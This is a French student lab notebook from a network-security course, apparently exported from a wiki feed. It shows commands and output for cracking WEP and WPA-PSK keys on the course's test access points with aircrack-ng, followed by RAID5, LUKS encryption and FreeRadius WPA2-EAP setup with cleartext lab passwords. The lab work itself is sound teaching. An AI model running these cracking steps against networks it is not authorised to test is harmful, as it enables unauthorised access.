&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avions une erreur à propos du subsystem. Pour que cela fonctionne, il nous manquait la commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install linux-image-3.16.0-4-amd64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de la machine, nous créons le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mkfs /dev/md0&lt;br /&gt;
root@GreenArrow:~# mkdir /datamd0&lt;br /&gt;
root@GreenArrow:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 13:20:27 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant un mauvais mot de passe, une erreur apparaît.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
Tout d'abord, nous installons FreeRadius sur notre machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous renseignons le login et le mot de passe pour se connecter à la borne Wifi : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GreenArrow Cleartext-Password:=&amp;quot;glopglop&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne E306 et E304 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
client E304 {&lt;br /&gt;
	ipaddr		= 10.60.1.4&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''', puis nous rentrons en mode configuration : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aaa authentication login eap_greenarrow group radius_greenarrow&lt;br /&gt;
radius-server host 193.48.57.162 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
aaa group server radius radius_greenarrow&lt;br /&gt;
server 193.48.57.162 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_GREENARROW&lt;br /&gt;
vlan 3&lt;br /&gt;
authentication open eap eap_greenarrow&lt;br /&gt;
authentication network-eap eap_greenarrow&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 3 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_GREENARROW&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 3&lt;br /&gt;
bridge-group 3 subscriber-loop-control&lt;br /&gt;
bridge-group 3 spanning-disabled&lt;br /&gt;
bridge-group 3 block-unknown-source&lt;br /&gt;
no bridge-group 3 source-learning&lt;br /&gt;
no bridge-group 3 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
bridge-group 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois ces modifications effectuées, nous configurons l'interface wlan0 de l'eeePC pour pouvoir se connecter au Wifi à l'aide de '''ifup wlan0''' : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.3.2&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.3.1&lt;br /&gt;
  wpa-ssid SSID_GREENARROW&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity GreenArrow&lt;br /&gt;
  wpa-password glopglop&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance le serveur FreeRadius via freeradius -X (mode debug).&lt;br /&gt;
Sur smartphone, nous arrivons à détecter notre SSID (SSID_GREENARROW). Nous pouvons également ping notre eeePC depuis la machine virtuelle, tout comme nous arrivons à pinger des Vm d'autres groupes depuis notre eeePC.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/freeradius# ping 10.60.3.2&lt;br /&gt;
PING 10.60.3.2 (10.60.3.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=1 ttl=255 time=1.30 ms&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=2 ttl=255 time=1.96 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Configuration d'un PCBX ====&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35900</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35900"/>
				<updated>2016-12-12T10:23:38Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Sécurisation Wifi par WPA2-EAP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
